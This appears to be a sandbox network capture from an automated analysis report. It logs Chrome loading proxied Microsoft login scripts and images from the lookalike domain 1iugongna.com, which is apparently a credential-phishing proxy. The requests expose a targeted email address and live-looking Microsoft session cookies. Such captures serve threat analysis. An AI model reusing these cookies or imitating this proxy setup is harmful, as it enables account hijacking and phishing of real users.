                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 6f 63 6b 65 64 3a 20 31 30 30 2c 0a 20 20 20 20 20 20 20 20 54 69 6c 65 73 3a 20 31 30 32 2c 0a 20 20 20 20 20 20 20 20 52 65 6d 6f 74 65 43 6f 6e 6e 65 63 74 3a 20 31 30 33 2c 0a 20 20 20 20 20 20 20 20 46 65 64 43 6f 6e 66 6c 69 63 74 3a 20 31 30 35 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 3a 20 31 30 36 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 4c 6f 67 69 6e 5f 50 68 6f 6e 65 53 69 67 6e 69 6e 3a 20 31 30 37 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 46 69 6e 69 73 68 3a 20 31 30 38 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 53 74 72 6f 6e 67 41 75 74 68 3a 20 31 30 39 2c 0a 20 20 20 20 20 20 20 20 57 69 6e 31 30 48 6f 73 74 5f 48 49 50 5f 4c 6f 67 69 6e 3a 20 31 31
                                                                              Data Ascii: ocked: 100, Tiles: 102, RemoteConnect: 103, FedConflict: 105, Win10Host_Login: 106, Win10Host_Login_PhoneSignin: 107, Win10Host_Finish: 108, Win10Host_StrongAuth: 109, Win10Host_HIP_Login: 11
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 20 28 50 52 4f 4f 46 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 54 79 70 65 3a 20 7b 0a 20 20 20 20 20 20 20 20 20 20 45 6d 61 69 6c 3a 20 31 2c 0a 20 20 20 20 20 20 20 20 20 20 41 6c 74 45 6d 61 69 6c 3a 20 32 2c 0a 20 20 20 20 20 20 20 20 20 20 53 4d 53 3a 20 33 2c 0a 20 20 20 20 20 20 20 20 20 20 44 65 76 69 63 65 49 64 3a 20 34 2c 0a 20 20 20 20 20 20 20 20 20 20 43 53 53 3a 20 35 2c 0a 20 20 20 20 20 20 20 20 20 20 53 51 53 41 3a 20 36 2c 0a 20 20 20 20 20 20 20 20 20 20 43 65 72 74 69 66 69 63 61 74 65 3a 20 37 2c 0a 20 20 20 20 20 20 20 20 20 20 48 49 50 3a 20 38 2c 0a 20 20 20 20 20 20 20 20 20 20 42 69 72 74 68 64 61 79 3a 20 39 2c 0a 20 20 20 20 20 20 20 20 20 20 54 4f 54 50 41 75 74 68 65 6e 74 69 63 61 74 6f 72 3a 20 31 30 2c 0a 20 20 20 20 20 20
                                                                              Data Ascii: (PROOF = { Type: { Email: 1, AltEmail: 2, SMS: 3, DeviceId: 4, CSS: 5, SQSA: 6, Certificate: 7, HIP: 8, Birthday: 9, TOTPAuthenticator: 10,
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 20 20 6e 20 7c 7c 20 22 22 20 3d 3d 3d 20 6e 20 7c 7c 20 28 6e 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 29 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 50 2e 70 61 72 73 65 28 6e 29 3b 0a 20 20 20 20 20 20 20 20 20 20 74 2e 71 75 65 72 79 20 3d 20 74 2e 71 75 65 72 79 20 7c 7c 20 7b 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 69 20 3d 20 73 2e 66 69 6e 64 4f 77 6e 50 72 6f 70 65 72 74 79 28 74 2e 71 75 65 72 79 2c 20 65 2c 20 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 20 3f 20 74 2e 71 75 65 72 79 5b 69 5d 20 3a 20 22 22 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 46 72 6f 6d 43
                                                                              Data Ascii: n || "" === n || (n = document.location.search); var t = P.parse(n); t.query = t.query || {}; var i = s.findOwnProperty(t.query, e, !0); return i ? t.query[i] : ""; }, appendOrReplaceFromC
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 5d 2f 67 2c 0a 20 20 20 20 20 20 20 20 20 20 67 61 70 2c 0a 20 20 20 20 20 20 20 20 20 20 69 6e 64 65 6e 74 2c 0a 20 20 20 20 20 20 20 20 20 20 6d 65 74 61 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 62 22 3a 20 22 5c 5c 62 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 74 22 3a 20 22 5c 5c 74 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 6e 22 3a 20 22 5c 5c 6e 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 66 22 3a 20 22 5c 5c 66 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 72 22 3a 20 22 5c 5c 72 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 22 27 3a 20 27 5c 5c 22 27 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 22 5c 5c 22 3a 20 22 5c 5c 5c 5c 22 2c 0a 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: ]/g, gap, indent, meta = { "\b": "\\b", "\t": "\\t", "\n": "\\n", "\f": "\\f", "\r": "\\r", '"': '\\"', "\\": "\\\\", },
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 20 20 20 20 76 61 72 20 6d 20 3d 20 66 2e 61 64 64 28 64 2c 20 63 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 2e 74 61 72 67 65 74 55 72 6c 20 3d 20 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 61 2e 48 61 6e 64 6c 65 72 2e 63 61 6c 6c 28 6e 2c 20 70 29 2c 20 6e 2e 73 65 6e 64 52 65 71 75 65 73 74 28 29 3b 0a 20 20 20 20 20 20 20 20 7d 29 2c 0a 20 20 20 20 20 20 20 20 28 6e 2e 42 65 61 63 6f 6e 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 74 2c 20 69 2c 20 61 2c 20 6f 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 76 61 72 20 72 20 3d 20 5b 5d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 76 28 21 30 29 3b 0a 20 20 20 20 20 20 20 20 20 20 70 2e 66 6f 72 45 61 63 68 28
                                                                              Data Ascii: var m = f.add(d, c); p.targetUrl = m; } } a.Handler.call(n, p), n.sendRequest(); }), (n.Beacon = function (e, t, i, a, o) { var r = [], s = v(!0); p.forEach(
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 6e 20 3f 20 28 6c 20 3d 3d 3d 20 70 2e 46 54 45 72 72 6f 72 20 3f 20 68 28 65 2c 20 64 29 20 3a 20 76 28 65 2c 20 64 29 29 20 3a 20 62 28 65 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 6b 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 67 20 3d 20 22 22 29 2c 20 28 6c 20 3d 20 70 2e 45 72 72 6f 72 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 54 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 28 6c 20 3d 20 70 2e 54 69 6d 65 6f 75 74 29 2c 20 28 75 20 3d 20 22 22 29 2c 20 28 66 20 3d 20 22 22 29 2c 20 28 67 20 3d 20 22 22 29 2c 20 76 28 64 29 3b 0a 20 20 20 20
                                                                              Data Ascii: n ? (l === p.FTError ? h(e, d) : v(e, d)) : b(e); } function k() { (g = ""), (l = p.Error), (u = ""), (f = ""), v(d); } function T() { (l = p.Timeout), (u = ""), (f = ""), (g = ""), v(d);
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 3d 20 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 74 20 3d 20 7b 20 63 72 65 64 54 79 70 65 3a 20 6d 2e 4f 6e 65 54 69 6d 65 43 6f 64 65 2c 20 70 72 6f 6f 66 3a 20 65 20 7d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 77 69 74 63 68 20 28 28 28 74 2e 70 72 6f 6f 66 2e 69 73 45 6e 63 72 79 70 74 65 64 20 3d 20 21 30 29 2c 20 65 2e 74 79 70 65 29 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 53 4d 53 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 61 73 65 20 50 52 4f 4f 46 2e 54 79 70 65 2e 56 6f 69 63 65 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 21 65 2e 69 73 56 6f 69 63 65 4f 6e 6c 79 29 20 7b 0a 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: = n) { var t = { credType: m.OneTimeCode, proof: e }; switch (((t.proof.isEncrypted = !0), e.type)) { case PROOF.Type.SMS: case PROOF.Type.Voice: if (!e.isVoiceOnly) {
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 3d 20 70 2e 61 70 70 65 6e 64 4f 72 52 65 70 6c 61 63 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 3f 22 20 2b 20 67 65 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 77 63 74 78 22 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 22 4c 6f 67 69 6e 4f 70 74 69 6f 6e 73 25 33 44 33 25 32 36 22 20 2b 20 70 2e 65 78 74 72 61 63 74 28 22 77 63 74 78 22 2c 20 22 3f 22 20 2b 20 67 65 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 28 74 20 3d 20 74 2e 73 75 62 73 74 72 28 31 29 29 2c 20 28 65 20 3d 20 70 2e 61 70 70 65 6e 64 28 65 2c 20 74 29 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                              Data Ascii: = p.appendOrReplace( "?" + ge, "wctx", "LoginOptions%3D3%26" + p.extract("wctx", "?" + ge) ); (t = t.substr(1)), (e = p.append(e, t));
                                                                              2025-01-10 20:42:03 UTC16384INData Raw: 20 20 28 65 2e 65 78 70 6f 72 74 73 20 3d 20 70 29 3b 0a 20 20 7d 2c 0a 20 20 66 75 6e 63 74 69 6f 6e 20 28 65 2c 20 6e 2c 20 74 29 20 7b 0a 20 20 20 20 76 61 72 20 69 20 3d 20 74 28 32 29 2c 0a 20 20 20 20 20 20 61 20 3d 20 74 28 31 29 2c 0a 20 20 20 20 20 20 6f 20 3d 20 74 28 34 29 2c 0a 20 20 20 20 20 20 72 20 3d 20 74 28 30 29 2c 0a 20 20 20 20 20 20 73 20 3d 20 77 69 6e 64 6f 77 2c 0a 20 20 20 20 20 20 63 20 3d 20 72 2e 44 69 61 6c 6f 67 49 64 3b 0a 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 64 28 65 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 6e 20 3d 20 74 68 69 73 2c 0a 20 20 20 20 20 20 20 20 74 20 3d 20 65 2e 69 73 50 6c 61 74 66 6f 72 6d 41 75 74 68 65 6e 74 69 63 61 74 6f 72 41 76 61 69 6c 61 62 6c 65 3b 0a 20 20 20 20 20 20 28 6e 2e 6f 6e 52 65 67
                                                                              Data Ascii: (e.exports = p); }, function (e, n, t) { var i = t(2), a = t(1), o = t(4), r = t(0), s = window, c = r.DialogId; function d(e) { var n = this, t = e.isPlatformAuthenticatorAvailable; (n.onReg


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.549905207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:04 UTC1726OUTGET /aadcdn.msauth.net/~/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_ae573f441ee1cf781ec7.js HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: script
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:04 UTC1385INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:04 GMT
                                                                              Content-Type: application/x-javascript
                                                                              content-length: 15748
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Content-Encoding: gzip
                                                                              Last-Modified: Thu, 26 Jan 2023 00:32:55 GMT
                                                                              ETag: 0x8DAFF34DE08B462
                                                                              x-ms-request-id: 90cf67bd-e01e-0044-37a0-633ed6000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204204Z-155884f84d45nhwrhC1BL1euyg0000000bh000000001bsh0
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
                                                                              Content-Security-Policy: default-src * data: blob: filesystem: about: ws: wss: 'unsafe-inline' 'unsafe-eval'; form-action * data: blob: 'unsafe-inline' 'unsafe-eval'; script-src * data: blob: 'unsafe-inline' 'unsafe-eval'; connect-src * data: blob: 'unsafe-inline'; img-src * data: blob: 'unsafe-inline'; frame-src * data: blob: filesystem: ; frame-ancestors 'self' * http://* https://* file://* about: javascript: data: blob: filesystem: ; object-src * data: blob: filesystem: 'unsafe-inline' 'unsafe-eval'; style-src * data: blob: 'unsafe-inline'; font-src * data: blob: 'unsafe-inline';
                                                                              2025-01-10 20:42:04 UTC10INData Raw: 1f 8b 08 00 00 00 00 00 00 03
                                                                              Data Ascii:
                                                                              2025-01-10 20:42:04 UTC5517INData Raw: ad 5b 7d 77 da c6 d2 ff ff 7e 0a a1 db 43 a4 9b b5 6c da a4 ed c5 55 7d 1c 5e 12 5a 3b 76 0d ee 5b 92 c3 11 68 01 c5 42 52 b5 c2 98 1a be fb f3 9b 5d 09 09 10 d8 e9 73 73 1c 83 76 67 67 67 67 e7 7d e4 e3 ff 54 fe a5 fd 47 3b 7a fe 3f ad db 3b bf e9 69 57 6d ad f7 ae 73 d3 d4 ae f1 f4 87 f6 fe aa d7 69 b4 9e 8f 87 36 a5 ff bd 89 27 b4 91 e7 73 0d 9f 03 47 70 57 0b 03 2d 8c 35 2f 18 86 71 14 c6 4e c2 85 36 c5 ef d8 73 7c 6d 14 87 53 2d 99 70 2d 8a c3 cf 7c 98 08 cd f7 44 82 45 03 ee 87 73 cd 00 ba d8 d5 ae 9d 38 59 68 9d 6b d3 02 7e 0e 6c de d8 0b b0 7a 18 46 0b 7c 9f 24 5a 10 26 de 90 6b 4e e0 4a 6c 3e 1e 02 c1 b5 59 e0 f2 58 9b 4f bc e1 44 bb f4 86 71 28 c2 51 a2 c5 7c c8 bd 7b 6c 22 66 18 df dc 82 69 4e cc 35 c1 13 6d 14 c6 c9 44 d1 61 69 5d 82 4c b1 0a
                                                                              Data Ascii: [}w~ClU}^Z;v[hBR]ssvgggg}TG;z?;iWmsi6'sGpW-5/qN6s|mS-p-|DEs8Yhk~lzF|$Z&kNJl>YXODq(Q|{l"fiN5mDai]L


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.549906207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:04 UTC1774OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_white_166de53471265253ab3a456defe6da23.gif HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:04 UTC735INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:04 GMT
                                                                              Content-Type: image/gif
                                                                              Content-Length: 2672
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:37 GMT
                                                                              ETag: 0x8D79B83739984DD
                                                                              x-ms-request-id: 51e397ec-f01e-0021-6ea0-63d880000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204204Z-1698bcdb8c7zkk7zhC1BL177p80000000bu000000000mf2m
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
                                                                              2025-01-10 20:42:04 UTC2672INData Raw: 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e 69 18 14 00 21
                                                                              Data Ascii: GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~i!


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.549904207.174.40.1824432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:42:04 UTC1768OUTGET /aadcdn.msauth.net/~/shared/1.0/content/images/marching_ants_b540a8e518037192e32c4fe58bf2dbab.gif HTTP/1.1
                                                                              Host: 1iugongna.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://1iugongna.com/?auth=2&qrc=recibase%40seamaritima.com&sso_reload=true
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: qPdM=mizFm7lvi4Ix; qPdM.sig=c7fMZa64FGu4IHTMDws8A8hsMMg; esctx-HOBDLFgotIk=AQABCQEAAABVrSpeuWamRam2jAF1XRQEo1ojLaEXLeNjepMPwcmCcn3EGEVlIgD31XT42FfZHyYenA_1hDRjOMpC7lacrzkSUZiTEcg-edG9wf6Q2mM3cYVdScp2VlZQt5s4zWVv7IqFVVlOmIaE7THbO4HLhEUlhlyYIMa5hngtEIg1DIv-CCAA; x-ms-gateway-slice=estsfd; stsservicecookie=estsfd; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; buid=1.AVAAqzBRR7ViQUKp00fjfJvCFakreHKQRANPjYJWI3DqNWYBAABQAA.AQABGgEAAADW6jl31mB3T7ugrWTT8pFe2eQ2_Oh4hN2tYvlvtK9ODQZ5HTHQHDjYSCdAvRHuIbwFts8xmUIM_kaw7EvYHZk44BBtSMP-jDZTmqTzrLIKIl3bnRQyqVSihSz50ItoClQgAA; esctx=PAQABBwEAAADW6jl31mB3T7ugrWTT8pFerxBcAprPMOSaKQmGrdkeantNBzM8XbTgiMQWXTQkKAGgQW7xH_OqfHMLpu1dm_gPZp7DvWWAzr7SvKOKA2BaPgV7gACk1DFeCfrsdGaQ1Z6yGFr-bezbdpqXewDrujPHiG2rO40tXBq7tSnDRpVdvw6_sPOAK2Z5x2uWMMn2-QUgAA; esctx-8EbrZrj4tW0=AQABCQEAAADW6jl31mB3T7ugrWTT8pFejzey7nCPxrg7gaqx-6HlVkMp3hRwwNhmLpJnPD3ihHAAk_qpXY0tCKsKcgy5kSU1O6PMagRgtS868ll1koMY21kTcvaeDZw39EOLdnmsVrN9tHjf6rNWNSTGRS97wjQ377YRN7x__ho8qda5Yy3giiAA; fpc=AqmpK8D-cVJBmJZccveAQWO4vjNwAQAA [TRUNCATED]
                                                                              2025-01-10 20:42:04 UTC735INHTTP/1.1 200 OK
                                                                              Date: Fri, 10 Jan 2025 20:42:04 GMT
                                                                              Content-Type: image/gif
                                                                              Content-Length: 3620
                                                                              Connection: close
                                                                              Cache-Control: public, max-age=31536000
                                                                              Last-Modified: Fri, 17 Jan 2020 19:28:38 GMT
                                                                              ETag: 0x8D79B8373B17F89
                                                                              x-ms-request-id: c2eefb0a-801e-0020-5ca0-63cf4e000000
                                                                              x-ms-version: 2009-09-19
                                                                              x-ms-lease-status: unlocked
                                                                              x-ms-blob-type: BlockBlob
                                                                              Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                              Access-Control-Allow-Origin: *
                                                                              x-azure-ref: 20250110T204204Z-155884f84d4gnrm8hC1BL1py0c0000000bpg0000000107nu
                                                                              x-fd-int-roxy-purgeid: 0
                                                                              X-Cache: TCP_MISS
                                                                              Accept-Ranges: bytes
